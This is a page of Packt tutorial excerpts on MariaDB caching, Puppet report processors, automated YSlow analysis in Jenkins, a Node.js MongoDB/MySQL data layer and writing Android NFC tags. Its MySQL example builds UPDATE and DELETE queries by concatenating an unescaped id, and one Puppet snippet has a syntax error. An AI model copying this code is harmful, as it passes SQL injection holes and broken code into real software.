Let's begin with database caching. All the data for our application is stored on MariaDB. When a request is made for retrieving the list of available students, we run a query on our course_registry database. Running a single query at a time is simple but as the application gets popular, we will have more concurrent users. As the number of concurrent connections to the database increases, we will have to make sure that our database server is optimized to handle that load. In this section, we will look at the different types of caching that can be performed in the database. Let's start with query caching. Query caching is available by default on MariaDB; to verify if the installation has a query cache, we will use the have_query_cache global variable. Let's use the SHOW VARIABLES command to verify if the query cache is available on our MariaDB installation, as shown in the following screenshot: Now that we have a query cache, let's verify if it is active. To do this, we will use the query_cache_type global variable, shown as follows: From this query, we can verify that the query cache is turned on. Now, let's take a look at the memory that is allocated for the query cache by using the query_cache_size command, shown as follows: The query cache size is currently set to 64 MB; let's modify our query cache size to 128 MB. The following screenshot shows the usage of the SET GLOBAL syntax: We use the SET GLOBAL syntax to set the value for the query_cache_size command, and we verify this by reloading the value of the query_cache_size command. Now that we have the query cache turned on and working, let's look at a few statistics that would give us an idea of how often the queries are being cached. To retrieve this information, we will query the Qcache variable, as shown in the following screenshot: From this output, we can verify whether we are retrieving a lot of statistics about the query cache. One thing to verify is the Qcache_not_cached variable that is high for our database. This is due to the use of prepared statements. The prepared statements are not cached by MariaDB. Another important variable to keep an eye on is the Qcache_lowmem_prunes variable that will give us an idea of the number of queries that were deleted due to low memory. This will indicate that the query cache size has to be increased. From these stats, we understand that for as long as we use the prepared statements, our queries will not be cached on the database server. So, we should use a combination of prepared statements and raw SQL statements, depending on our use cases. Now that we understand a good bit about query caches, let's look at the other caches that MariaDB provides, such as the table open cache, the join cache, and the memory storage cache. The table open cache allows us to define the number of tables that can be left open by the server to allow faster look-ups. This will be very helpful where there is a huge number of requests for a table, and so the table need not be opened for every request. The join buffer cache is commonly used for queries that perform a full join, wherein there are no indexes to be used for finding rows for the next table. Normally, indexes help us avoid these problems. The memory storage cache, previously known as the heap cache, is commonly is used for read-only caches of data from other tables or for temporary work areas. Let's look at the variables that are with MariaDB, as shown in the following screenshot: Database caching is a very important step towards making our application scalable. However, it is important to understand when to cache, the correct caching techniques, and the size for each cache. Allocation of memory for caching has to be done very carefully as the application can run out of memory if too much space is allocated. A good method to allocate memory for caching is by running benchmarks to see how the queries perform, and have a list of popular queries that will run often so that we can begin by caching and optimizing the database for those queries. Now that we have a good understanding of database caching, let's proceed to application-level caching. Resources for Article: Introduction to Kohana PHP Framework Creating and Consuming Web Services in CakePHP 1.3 Installing MariaDB on Windows and Mac OS X
Read more
  • 0
  • 0
  • 11264

article-image-anatomy-report-processor
Packt
11 Jun 2014
6 min read
Save for later

The anatomy of a report processor

Packt
11 Jun 2014
6 min read
(For more resources related to this topic, see here.) At its most basic, a Puppet report processor is a piece of Ruby code that is triggered every time a Puppet agent passes a report to the Puppet master. This piece of code is passed as a Ruby object that contains both the client report and metrics. Although the data is sent in a wire format, such as YAML or PSON, by the time a report processor is triggered, this data is turned into an object by Puppet. This code can simply provide reports, but we're not limited to that. With a little imagination, we can use Puppet report processors for everything from alerts through to the orchestration of events. For instance, using a report processor and a suitable SMS provider would make it easy for Puppet to send you an SMS alert every time a run fails, or alternatively, using a report processor, you could analyze the data to reveal trends in your changes and update a change management console. The best way to think of a report processor is that it is a means to trigger actions on the event of a change, rather than strictly a reporting tool. Puppet reports are written in plain old Ruby, and so you have access to the multitude of libraries available via the RubyGems repositories. This can make developing your plugins relatively simple, as half the time you will find that the heavy lifting has been done for you by some enterprising fellow who has already solved your problem and published his code in a gem. Good examples of this can be found if you need to interoperate with another product such as MySQL, Oracle, Salesforce, and so on. A brief search on the Internet will bring up three or four examples of libraries that will offer this functionality within a few lines of code. Not having to produce the plumbing of a solution will both save time and generally produce fewer bugs. Creating a basic report processor Let's take a look at an incredibly simple report processor example. In the event that a Puppet agent fails to run, the following code will take the incoming data and create a little text file with a short message detailing which host had the problem: include puppet Puppet::Reports::register_report(:myfirstreport) do desc "My very first report!" def process if self.status == 'failed' msg = "failed puppet run for #{self.host} #{self.status} File.open('./tmp/puppetpanic.txt', 'w') { | f | f.write(msg)} end end end Although this code is basic, it contains all of the components required for a report processor. The first line includes the only mandatory library required: the Puppet library. This gives us access to several important methods that allow us to register and describe our report processor, and finally, a method to allow us to process our data. Registering your report processor The first method that every report processor must call is the Puppet::Reports::register_report method. This method can only take one argument, which is the name of the report processor. This name should be passed as a symbol and an alphanumeric title that starts with a letter (:report3 would be fine, but :3reports would not be). Try to avoid using any other characters—although you can potentially use underscores, the documentation is rather discouragingly vague on how valid this is and could well cause issues. Describing your report processor After we've called the Puppet::Reports::register_report method, we then need to call the desc method. The desc method is used to provide some brief documentation for what the report processor does and allows the use of Markdown formatting in the string. Processing your report The last method that every report processor must include is the process method. The process method is where we actually take our Puppet data and process it, and to make working with the report data easier, you have access to the .self object within the process method. The .self object is a Puppet::Transaction::Report object and gives you access to the Puppet report data. For example, to extract the hostname of the reporting host, we can use the self.host object. You can find the full details of what is contained in the Puppet::Transaction::Report object by visiting http://docs.puppetlabs.com/puppet/latest/reference/format_report.html. Let's go through our small example in detail and look at what it's doing. First of all, we include the Puppet library to ensure that we have access to the required methods. We then register our report by calling the Puppet::Reports::register_report(:myfirstreport) method and pass it the name of myfirstreport. Next, we add our desc method to tell users what this report is for. Finally, we have the process method, which is where we are going to place our code to process the report. For this example, we're going to keep it simple and simply check if the Puppet agent reported a successful run or not, and we do this by checking the Puppet status. This is described in the following code snippet: if self.status == 'failed' msg = "failed puppet run for #{self.host}#{self.status}" The transaction can produce one of three states: failed, changed, or unchanged. This is straightforward; a failed client run is any run that contains a resource that has a status of failed, a changed state is triggered when the client run contains a resource that has been given a status of changed, and the unchanged state occurs when a resource contains a value of out_of_sync; this generally happens if you run the Puppet client in noop (simulation) mode. Finally, we actually do something with the data. In the case of this very simple application, we're going to place the warning into a plain text file in the /tmp directory. This is described in the following code snippet: msg = "failed puppet run for #{self.host}" File.open('/tmp/puppetpanic.txt', 'w') { | f | f.write(msg)} As you can see, we're using basic string interpolation to take some of our report data and place it into the message. This is then written into a simple plain text file in the /tmp directory. Summary In this article, we have seen the anatomy of a report processor. We have also seen a basic Ruby code that sets up a simple report processor. Resources for Article: Further resources on this subject: Puppet: Integrating External Tools [Article] Quick start – Using the core Puppet resource types [Article] External Tools and the Puppet Ecosystem [Article]
Read more
  • 0
  • 0
  • 1452

article-image-automating-performance-analysis-yslow-and-phantomjs
Packt
10 Jun 2014
12 min read
Save for later

Automating performance analysis with YSlow and PhantomJS

Packt
10 Jun 2014
12 min read
(For more resources related to this topic, see here.) Getting ready To run this article, the phantomjs binary will need to be accessible to the continuous integration server, which may not necessarily share the same permissions or PATH as our user. We will also need a target URL. We will use the PhantomJS port of the YSlow library to execute the performance analysis on our target web page. The YSlow library must be installed somewhere on the filesystem that is accessible to the continuous integration server. For our example, we have placed the yslow.js script in the tmp directory of the jenkins user's home directory. To find the jenkins user's home directory on a POSIX-compatible system, first switch to that user using the following command: sudo su - jenkins Then print the home directory to the console using the following command: echo $HOME We will need to have a continuous integration server set up where we can configure the jobs that will execute our automated performance analyses. The example that follows will use the open source Jenkins CI server. Jenkins CI is too large a subject to introduce here, but this article does not assume any working knowledge of it. For information about Jenkins CI, including basic installation or usage instructions, or to obtain a copy for your platform, visit the project website at http://jenkins-ci.org/. Our article uses version 1.552. The combination of PhantomJS and YSlow is in no way unique to Jenkins CI. The example aims to provide a clear illustration of automated performance testing that can easily be adapted to any number of continuous integration server environments. The article also uses several plugins on Jenkins CI to help facilitate our automated testing. These plugins include: Environment Injector Plugin JUnit Attachments Plugin TAP Plugin xUnit Plugin To run that demo site, we must have Node.js installed. In a separate terminal, change to the phantomjs-sandbox directory (in the sample code's directory), and start the app with the following command: node app.js How to do it… To execute our automated performance analyses in Jenkins CI, the first thing that we need to do is set up the job as follows: Select the New Item link in Jenkins CI. Give the new job a name (for example, YSlow Performance Analysis), select Build a free-style software project, and then click on OK. To ensure that the performance analyses are automated, we enter a Build Trigger for the job. Check off the appropriate Build Trigger and enter details about it. For example, to run the tests every two hours, during business hours, Monday through Friday, check Build periodically and enter the Schedule as H 9-16/2 * * 1-5. In the Build block, click on Add build step and then click on Execute shell. In the Command text area of the Execute Shell block, enter the shell commands that we would normally type at the command line, for example: phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f junit http ://localhost:3000/css-demo > yslow.xml In the Post-build Actions block, click on Add post-build action and then click on Publish JUnit test result report. In the Test report XMLs field of the Publish JUnit Test Result Report block, enter *.xml. Lastly, click on Save to persist the changes to this job. Our performance analysis job should now run automatically according to the specified schedule; however, we can always trigger it manually by navigating to the job in Jenkins CI and clicking on Build Now. After a few of the performance analyses have completed, we can navigate to those jobs in Jenkins CI and see the results shown in the following screenshots: The landing page for a performance analysis project in Jenkins CI Note the Test Result Trend graph with the successes and failures. The Test Result report page for a specific build Note that the failed tests in the overall analysis are called out and that we can expand specific items to view their details. The All Tests view of the Test Result report page for a specific build Note that all tests in the performance analysis are listed here, regardless of whether they passed or failed, and that we can click into a specific test to view its details. How it works… The driving principle behind this article is that we want our continuous integration server to periodically and automatically execute the YSlow analyses for us so that we can monitor our website's performance over time. This way, we can see whether our changes are having an effect on overall site performance, receive alerts when performance declines, or even fail builds if we fall below our performance threshold. The first thing that we do in this article is set up the build job. In our example, we set up a new job that was dedicated to the YSlow performance analysis task. However, these steps could be adapted such that the performance analysis task is added onto an existing multipurpose job. Next, we configured when our job will run, adding Build Trigger to run the analyses according to a schedule. For our schedule, we selected H 9-16/2 * * 1-5, which runs the analyses every two hours, during business hours, on weekdays. While the schedule that we used is fine for demonstration purposes, we should carefully consider the needs of our project—chances are that a different Build Trigger will be more appropriate. For example, it may make more sense to select Build after other projects are built, and to have the performance analyses run only after the new code has been committed, built, and deployed to the appropriate QA or staging environment. Another alternative would be to select Poll SCM and to have the performance analyses run only after Jenkins CI detects new changes in source control. With the schedule configured, we can apply the shell commands necessary for the performance analyses. As noted earlier, the Command text area accepts the text that we would normally type on the command line. Here we type the following: phantomjs: This is for the PhantomJS executable binary ${HOME}/tmp/yslow.js: This is to refer to the copy of the YSlow library accessible to the Jenkins CI user -i grade: This is to indicate that we want the "Grade" level of report detail -threshold "B": This is to indicate that we want to fail builds with an overall grade of "B" or below -f junit: This is to indicate that we want the results output in the JUnit format http://localhost:3000/css-demo: This is typed in as our target URL > yslow.xml: This is to redirect the JUnit-formatted output to that file on the disk What if PhantomJS isn't on the PATH for the Jenkins CI user? A relatively common problem that we may experience is that, although we have permission on Jenkins CI to set up new build jobs, we are not the server administrator. It is likely that PhantomJS is available on the same machine where Jenkins CI is running, but the jenkins user simply does not have the phantomjs binary on its PATH. In these cases, we should work with the person administering the Jenkins CI server to learn its path. Once we have the PhantomJS path, we can do the following: click on Add build step and then on Inject environment variables; drag-and-drop the Inject environment variables block to ensure that it is above our Execute shell block; in the Properties Content text area, apply the PhantomJS binary's path to the PATH variable, as we would in any other script as follows: PATH=/path/to/phantomjs/bin:${PATH} After setting the shell commands to execute, we jump into the Post-build Actions block and instruct Jenkins CI where it can find the JUnit XML reports. As our shell command is redirecting the output into a file that is directly in the workspace, it is sufficient to enter an unqualified *.xml here. Once we have saved our build job in Jenkins CI, the performance analyses can begin right away! If we are impatient for our first round of results, we can click on Build Now for our job and watch as it executes the initial performance analysis. As the performance analyses are run, Jenkins CI will accumulate the results on the filesystem, keeping them until they are either manually removed or until a discard policy removes old build information. We can browse these accumulated jobs in the web UI for Jenkins CI, clicking on the Test Result link to drill into them. There's more… The first thing that bears expanding upon is that we should be thoughtful about what we use as the target URL for our performance analysis job. The YSlow library expects a single target URL, and as such, it is not prepared to handle a performance analysis job that is otherwise configured to target two or more URLs. As such, we must select a strategy to compensate for this, for example: Pick a representative page: We could manually go through our site and select the single page that we feel best represents the site as a whole. For example, we could pick the page that is "most average" compared to the other pages ("most will perform at about this level"), or the page that is most likely to be the "worst performing" page ("most pages will perform better than this"). With our representative page selected, we can then extrapolate performance for other pages from this specimen. Pick a critical page: We could manually select the single page that is most sensitive to performance. For example, we could pick our site's landing page (for example, "it is critical to optimize performance for first-time visitors"), or a product demo page (for example, "this is where conversions happen, so this is where performance needs to be best"). Again, with our performance-sensitive page selected, we can optimize the general cases around the specific one. Set up multiple performance analysis jobs: If we are not content to extrapolate site performance from a single specimen page, then we could set up multiple performance analysis jobs—one for each page on the site that we want to test. In this way, we could (conceivably) set up an exhaustive performance analysis suite. Unfortunately, the results will not roll up into one; however, once our site is properly tuned, we need to only look for the telltale red ball of a failed build in Jenkins CI. The second point worth considering is—where do we point PhantomJS and YSlow for the performance analysis? And how does the target URL's environment affect our interpretation of the results? If we are comfortable running our performance analysis against our production deploys, then there is not much else to discuss—we are assessing exactly what needs to be assessed. But if we are analyzing performance in production, then it's already too late—the slow code has already been deployed! If we have a QA or staging environment available to us, then this is potentially better; we can deploy new code to one of these environments for integration and performance testing before putting it in front of the customers. However, these environments are likely to be different from production despite our best efforts. For example, though we may be "doing everything else right", perhaps our staging server causes all traffic to come back from a single hostname, and thus, we cannot properly mimic a CDN, nor can we use cookie-free domains. Do we lower our threshold grade? Do we deactivate or ignore these rules? How can we tell apart the false negatives from the real warnings? We should put some careful thought into this—but don't be disheartened—better to have results that are slightly off than to have no results at all! Using TAP format If JUnit formatted results turn out to be unacceptable, there is also a TAP plugin for Jenkins CI. Test Anything Protocol (TAP) is a plain text-based report format that is relatively easy for both humans and machines to read. With the TAP plugin installed in Jenkins CI, we can easily configure our performance analysis job to use it. We would just make the following changes to our build job: In the Command text area of our Execute shell block, we would enter the following command: phantomjs ${HOME}/tmp/yslow.js -i grade -threshold "B" -f tap http ://localhost:3000/css-demo > yslow.tap In the Post-build Actions block, we would select Publish TAP Results instead of Publish JUnit test result report and enter yslow.tap in the Test results text field. Everything else about using TAP instead of JUnit-formatted results here is basically the same. The job will still run on the schedule we specify, Jenkins CI will still accumulate test results for comparison, and we can still explore the details of an individual test's outcomes. The TAP plugin adds an additional link in the job for us, TAP Extended Test Results, as shown in the following screenshot: One thing worth pointing out about using TAP results is that it is much easier to set up a single job to test multiple target URLs within a single website. We can enter multiple tests in the Execute Shell block (separating them with the && operator) and then set our Test Results target to be *.tap. This will conveniently combine the results of all our performance analyses into one. Summary In this article, we saw setting up of an automated performance analysis task on a continuous integration server (for example, Jenkins CI) using PhantomJS and the YSlow library. Resources for Article: Further resources on this subject: Getting Started [article] Introducing a feature of IntroJs [article] So, what is Node.js? [article]
Read more
  • 0
  • 0
  • 5514
article-image-selecting-and-initializing-database
Packt
10 Jun 2014
7 min read
Save for later

Selecting and initializing the database

Packt
10 Jun 2014
7 min read
(For more resources related to this topic, see here.) In other words, it's simpler than a SQL database, and very often stores information in the key value type. Usually, such solutions are used when handling and storing large amounts of data. It is also a very popular approach when we need flexible schema or when we want to use JSON. It really depends on what kind of system we are building. In some cases, MySQL could be a better choice, while in some other cases, MongoDB. In our example blog, we're going to use both. In order to do this, we will need a layer that connects to the database server and accepts queries. To make things a bit more interesting, we will create a module that has only one API, but can switch between the two database models. Using NoSQL with MongoDB Let's start with MongoDB. Before we start storing information, we need a MongoDB server running. It can be downloaded from the official page of the database https://www.mongodb.org/downloads. We are not going to handle the communication with the database manually. There is a driver specifically developed for Node.js. It's called mongodb and we should include it in our package.json file. After successful installation via npm install, the driver will be available in our scripts. We can check this as follows: "dependencies": { "mongodb": "1.3.20" } We will stick to the Model-View-Controller architecture and the database-related operations in a model called Articles. We can see this as follows: var crypto = require("crypto"), type = "mongodb", client = require('mongodb').MongoClient, mongodb_host = "127.0.0.1", mongodb_port = "27017", collection; module.exports = function() { if(type == "mongodb") { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { ... }, remove: function(id, callback) { ... } } } else { return { add: function(data, callback) { ... }, update: function(data, callback) { ... }, get: function(callback) { ... }, remove: function(id, callback) { ... } } } } It starts with defining a few dependencies and settings for the MongoDB connection. Line number one requires the crypto module. We will use it to generate unique IDs for every article. The type variable defines which database is currently accessed. The third line initializes the MongoDB driver. We will use it to communicate with the database server. After that, we set the host and port for the connection and at the end a global collection variable, which will keep a reference to the collection with the articles. In MongoDB, the collections are similar to the tables in MySQL. The next logical step is to establish a database connection and perform the needed operations, as follows: connection = 'mongodb://'; connection += mongodb_host + ':' + mongodb_port; connection += '/blog-application'; client.connect(connection, function(err, database) { if(err) { throw new Error("Can't connect"); } else { console.log("Connection to MongoDB server successful."); collection = database.collection('articles'); } }); We pass the host and the port, and the driver is doing everything else. Of course, it is a good practice to handle the error (if any) and throw an exception. In our case, this is especially needed because without the information in the database, the frontend has nothing to show. The rest of the module contains methods to add, edit, retrieve, and delete records: return { add: function(data, callback) { var date = new Date(); data.id = crypto.randomBytes(20).toString('hex'); data.date = date.getFullYear() + "-" + date.getMonth() + "-" + date.getDate(); collection.insert(data, {}, callback || function() {}); }, update: function(data, callback) { collection.update( {ID: data.id}, data, {}, callback || function(){ } ); }, get: function(callback) { collection.find({}).toArray(callback); }, remove: function(id, callback) { collection.findAndModify( {ID: id}, [], {}, {remove: true}, callback ); } } The add and update methods accept the data parameter. That's a simple JavaScript object. For example, see the following code: { title: "Blog post title", text: "Article's text here ..." } The records are identified by an automatically generated unique id. The update method needs it in order to find out which record to edit. All the methods also have a callback. That's important, because the module is meant to be used as a black box, that is, we should be able to create an instance of it, operate with the data, and at the end continue with the rest of the application's logic. Using MySQL We're going to use an SQL type of database with MySQL. We will add a few more lines of code to the already working Articles.js model. The idea is to have a class that supports the two databases like two different options. At the end, we should be able to switch from one to the other, by simply changing the value of a variable. Similar to MongoDB, we need to first install the database to be able use it. The official download page is http://www.mysql.com/downloads. MySQL requires another Node.js module. It should be added again to the package.json file. We can see the module as follows: "dependencies": { "mongodb": "1.3.20", "mysql": "2.0.0" } Similar to the MongoDB solution, we need to firstly connect to the server. To do so, we need to know the values of the host, username, and password fields. And because the data is organized in databases, a name of the database. In MySQL, we put our data into different databases. So, the following code defines the needed variables: var mysql = require('mysql'), mysql_host = "127.0.0.1", mysql_user = "root", mysql_password = "", mysql_database = "blog_application", connection; The previous example leaves the password field empty but we should set the proper value of our system. The MySQL database requires us to define a table and its fields before we start saving data. So, consider the following code: CREATE TABLE IF NOT EXISTS `articles` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` longtext NOT NULL, `text` longtext NOT NULL, `date` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; Once we have a database and its table set, we can continue with the database connection, as follows: connection = mysql.createConnection({ host: mysql_host, user: mysql_user, password: mysql_password }); connection.connect(function(err) { if(err) { throw new Error("Can't connect to MySQL."); } else { connection.query("USE " + mysql_database, function(err, rows, fields) { if(err) { throw new Error("Missing database."); } else { console.log("Successfully selected database."); } }) } }); The driver provides a method to connect to the server and execute queries. The first executed query selects the database. If everything is ok, you should see Successfully selected database as an output in your console. Half of the job is done. What we should do now is replicate the methods returned in the first MongoDB implementation. We need to do this because when we switch to the MySQL usage, the code using the class will not work. And by replicating them we mean that they should have the same names and should accept the same arguments. If we do everything correctly, at the end our application will support two types of databases. And all we have to do is change the value of the type variable: return { add: function(data, callback) { var date = new Date(); var query = ""; query += "INSERT INTO articles (title, text, date) VALUES ("; query += connection.escape(data.title) + ", "; query += connection.escape(data.text) + ", "; query += "'" + date.getFullYear() + "-" + date.getMonth() + "-" + date.getDate() + "'"; query += ")"; connection.query(query, callback); }, update: function(data, callback) { var query = "UPDATE articles SET "; query += "title=" + connection.escape(data.title) + ", "; query += "text=" + connection.escape(data.text) + " "; query += "WHERE id='" + data.id + "'"; connection.query(query, callback); }, get: function(callback) { var query = "SELECT * FROM articles ORDER BY id DESC"; connection.query(query, function(err, rows, fields) { if(err) { throw new Error("Error getting."); } else { callback(rows); } }); }, remove: function(id, callback) { var query = "DELETE FROM articles WHERE id='" + id + "'"; connection.query(query, callback); } } The code is a little longer than the one generated in the first MongoDB variant. That's because we needed to construct MySQL queries from the passed data. Keep in mind that we have to escape the information, which comes to the module. That's why we use connection.escape(). With these lines of code, our model is completed. Now we can add, edit, remove, or get data. Summary In this article, we saw how to select and initialize database using NoSQL with MongoDB and using MySQL required for writing a blog application with Node.js and AngularJS. Resources for Article: Further resources on this subject: So, what is Node.js? [Article] Understanding and Developing Node Modules [Article] An Overview of the Node Package Manager [Article]
Read more
  • 0
  • 0
  • 7154

article-image-writing-tag-content
Packt
10 Jun 2014
9 min read
Save for later

Writing Tag Content

Packt
10 Jun 2014
9 min read
(For more resources related to this topic, see here.) The NDEF Message is composed by one or more NDEF records, and each record contains the payload and a header in which the data length and type and identifier are stored. In this article, we will create some examples that will allow us to work with the NDEF standard and start writing NFC applications. Working with the NDEF record Android provides an easy way to read and write data when it is formatted as per the standard NDEF. This format is the easiest way for us to work with tag data because it saves us from performing lots of operations and processes of reading and writing raw bytes. So, unless we need to get our hands dirty and write our own protocol, this is the way to go (you can still build it on top of NDEF and achieve a custom, yet standard-based protocol). Getting ready Make sure you have a working Android development environment. If you don't, ADT Bundle is a good environment to start with (you can access it by navigating to http://developer.android.com/sdk/index.html). Make sure you have an NFC-enabled Android device or a virtual test environment. It will be assumed that Eclipse is the development IDE. How to do it... We are going to create an application that writes any NDEF record to a tag by performing the following steps: Open Eclipse and create a new Android application project named NfcBookCh3Example1 with the package name nfcbook.ch3.example1. Make sure the AndroidManifest.xml file is correctly configured. Open the MainActivity.java file located under com.nfcbook.ch3.example1 and add the following class member: private NfcAdapter nfcAdapter; Implement the enableForegroundDispatch method and filter tags by using Ndef and NdefFormatable.Invoke in the onResume method: private void enableForegroundDispatch() { Intent intent = new Intent(this, MainActivity.class).addFlags(Intent.FLAG_RECEIVER_REPLACE_PENDING); PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, intent, 0); IntentFilter[] intentFilter = new IntentFilter[] {}; String[][] techList = new String[][] { { android.nfc.tech.Ndef.class.getName() }, { android.nfc.tech.NdefFormatable.class.getName() } }; if ( Build.DEVICE.matches(".*generic.*") ) { //clean up the tech filter when in emulator since it doesn't work properly. techList = null; } nfcAdapter.enableForegroundDispatch(this, pendingIntent, intentFilter, techList); } Instantiate the nfcAdapter class field in the onCreate method: protected void onCreate(Bundle savedInstanceState) { ... nfcAdapter = NfcAdapter.getDefaultAdapter(this); } Implement the formatTag method: private boolean formatTag(Tag tag, NdefMessage ndefMessage) { try { NdefFormatable ndefFormat = NdefFormatable.get(tag); if (ndefFormat != null) { ndefFormat.connect(); ndefFormat.format(ndefMessage); ndefFormat.close(); return true; } } catch (Exception e) { Log.e("formatTag", e.getMessage()); } return false; } Implement the writeNdefMessage method: private boolean writeNdefMessage(Tag tag, NdefMessage ndefMessage) { try { if (tag != null) { Ndef ndef = Ndef.get(tag); if (ndef == null) { return formatTag(tag, ndefMessage); } else { ndef.connect(); if (ndef.isWritable()) { ndef.writeNdefMessage(ndefMessage); ndef.close(); return true; } ndef.close(); } } } catch (Exception e) { Log.e("formatTag", e.getMessage()); } return false; } Implement the isNfcIntent method: boolean isNfcIntent(Intent intent) { return intent.hasExtra(NfcAdapter.EXTRA_TAG); } Override the onNewIntent method using the following code: @Override protected void onNewIntent(Intent intent) { try { if (isNfcIntent(intent)) { NdefRecord ndefEmptyRecord = new NdefRecord(NdefRecord.TNF_EMPTY, new byte[]{}, new byte[]{}, new byte[]{}); NdefMessage ndefMessage = new NdefMessage(new NdefRecord[] { ndefEmptyRecord }); Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG); if (writeNdefMessage(tag, ndefMessage)) { Toast.makeText(this, "Tag written!", Toast.LENGTH_SHORT).show(); } else { Toast.makeText(this, "Failed to write tag", Toast.LENGTH_SHORT).show(); } } } catch (Exception e) { Log.e("onNewIntent", e.getMessage()); } } Override the onPause method and insert the following code: @Override protected void onPause() { super.onPause(); nfcAdapter.disableForegroundDispatch(this); } Open the NFC Simulator tool and simulate a few tags. The tag should be marked as modified, as shown in the following screenshot: In the NFC Simulator, a tag name that ends with _LOCKED is not writable, so we won't be able to write any content to the tag and, therefore, a Failed to write tag toast will appear. How it works... NFC intents carry an extra value with them that is a virtual representation of the tag and can be obtained using the NfcAdapter.EXTRA_TAG key. We can get information about the tag, such as the tag ID and its content type, through this object. In the onNewIntent method, we retrieve the tag instance and then use other classes provided by Android to easily read, write, and retrieve even more information about the tag. These classes are as follows: android.nfc.tech.Ndef: This class provides methods to retrieve and modify the NdefMessage object on a tag android.nfc.tech.NdefFormatable: This class provides methods to format tags that are capable of being formatted as NDEF The first thing we need to do while writing a tag is to call the get(Tag tag) method from the Ndef class, which will return an instance of the same class. Then, we need to open a connection with the tag by calling the connect() method. With an open connection, we can now write a NDEF message to the tag by calling the writeNdefMessage(NdefMessage msg) method. Checking whether the tag is writable or not is always a good practice to prevent unwanted exceptions. We can do this by calling the isWritable() method. Note that this method may not account for physical write protection. When everything is done, we call the close() method to release the previously opened connection. If the get(Tag tag) method returns null, it means that the tag is not formatted as per the NDEF format, and we should try to format it correctly. For formatting a tag with the NDEF format, we use the NdefFormatable class in the same way as we did with the Ndef class. However, in this case, we want to format the tag and write a message. This is achieved by calling the format(NdefMessage firstMessage) method. So, we should call the get(Tag tag) method, then open a connection by calling connect(), format the tag, and write the message by calling the format(NdefMessage firstMessage) method. Finally, close the connection with the close() method. If the get(Tag tag) method returns null, it means that the tag is the Android NFC API that cannot automatically format the tag to NDEF. An NDEF message is composed of several NDEF records. Each of these records is composed of four key properties: Type Name Format (TNF): This property defines how the type field should be interpreted Record Type Definition (RTD): This property is used together with the TNF to help Android create the correct NDEF message and trigger the corresponding intent Id: This property lets you define a custom identifier for the record Payload: This property contains the content that will be transported to the record Using the combinations between the TNF and the RTD, we can create several different NDEF records to hold our data and even create our custom types. In this recipe, we created an empty record. The main TNF property values of a record are as follows: - TNF_ABSOLUTE_URI: This is a URI-type field - TNF_WELL_KNOWN: This is an NFC Forum-defined URN - TNF_EXTERNAL_TYPE: This is a URN-type field - TNF_MIME_MEDIA: This is a MIME type based on the type specified The main RTF property values of a record are: - RTD_URI: This is the URI based on the payload - RTD_TEXT: This is the NFC Forum-defined record type Writing a URI-formatted record URI is probably the most common content written to NFC tags. It allows you to share a website, an online service, or a link to the online content. This can be used, for example, in advertising and marketing. How to do it... We are going to create an application that writes URI records to a tag by performing the following steps. The URI will be hardcoded and will point to the Packt Publishing website. Open Eclipse and create a new Android application project named NfcBookCh3Example2. Make sure the AndroidManifest.xml file is configured correctly. Set the minimum SDK version to 14: <uses-sdk android_minSdkVersion="14" /> Implement the enableForegroundDispatch, isNfcIntent, formatTag, and writeNdefMessage methods from the previous recipe—steps 2, 4, 6, and 7. Add the following class member and instantiate it in the onCreate method: private NfcAdapter nfcAdapter; protected void onCreate(Bundle savedInstanceState) { ... nfcAdapter = NfcAdapter.getDefaultAdapter(this); } Override the onNewIntent method and place the following code: @Override protected void onNewIntent(Intent intent) { try { if (isNfcIntent(intent)) { NdefRecord uriRecord = NdefRecord.createUri("http://www.packtpub.com"); NdefMessage ndefMessage = new NdefMessage(new NdefRecord[] { uriRecord }); Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG); boolean writeResult = writeNdefMessage(tag, ndefMessage); if (writeResult) { Toast.makeText(this, "Tag written!", Toast.LENGTH_SHORT).show(); } else { Toast.makeText(this, "Tag write failed!", Toast.LENGTH_SHORT).show(); } } } catch (Exception e) { Log.e("onNewIntent", e.getMessage()); } super.onNewIntent(intent); } Run the application. Tap a tag on your phone or simulate a tap in the NFC Simulator. A Write Successful! toast should appear. How it works... URIs are perfect content for NFC tags because with a relatively small amount of content, we can send users to more rich and complete resources. These types of records are the most easy to create, and this is done by calling the NdefRecord.createUri method and passing the URI as the first parameter. URIs are not necessarily URLs for a website. We can use other URIs that are quite well-known in Android such as the following: - tel:+000 000 000 000 - sms:+000 000 000 000 If we write the tel: uri syntax, the user will be prompted to initiate a phone call. We can always create a URI record the hard way without using the createUri method: public NdefRecord createUriRecord(String uri) { NdefRecord rtdUriRecord = null; try { byte[] uriField; uriField = uri.getBytes("UTF-8"); byte[] payload = new byte[uriField.length + 1]; //+1 for the URI prefix payload[0] = 0x00; //prefixes the URI System.arraycopy(uriField, 0, payload, 1, uriField.length); rtdUriRecord = new NdefRecord(NdefRecord.TNF_WELL_KNOWN, NdefRecord.RTD_URI, new byte[0], payload); } catch (UnsupportedEncodingException e) { Log.e("createUriRecord", e.getMessage()); } return rtdUriRecord; } The first byte in the payload indicates which prefix should be used with the URI. This way, we don't need to write the whole URI in the tag, which saves some tag space. The following list describes the recognized prefixes: 0x00 No prepending is done 0x01 http://www. 0x02 https://www. 0x03 http:// 0x04 https:// 0x05 tel: 0x06 mailto: 0x07 ftp://anonymous:anonymous@ 0x08 ftp://ftp. 0x09 ftps:// 0x0A sftp:// 0x0B smb:// 0x0C nfs:// 0x0D ftp:// 0x0E dav:// 0x0F news: 0x10 telnet:// 0x11 imap: 0x12 rtsp:// 0x13 urn: 0x14 pop: 0x15 sip: 0x16 sips: 0x17 tftp: 0x18 btspp:// 0x19 btl2cap:// 0x1A btgoep:// 0x1B tcpobex:// 0x1C irdaobex:// 0x1D file:// 0x1E urn:epc:id: 0x1F urn:epc:tag: 0x20 urn:epc:pat: 0x21 urn:epc:raw: 0x22 urn:epc: 0x23 urn:nfc:
Read more
  • 0
  • 0
  • 4732

article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
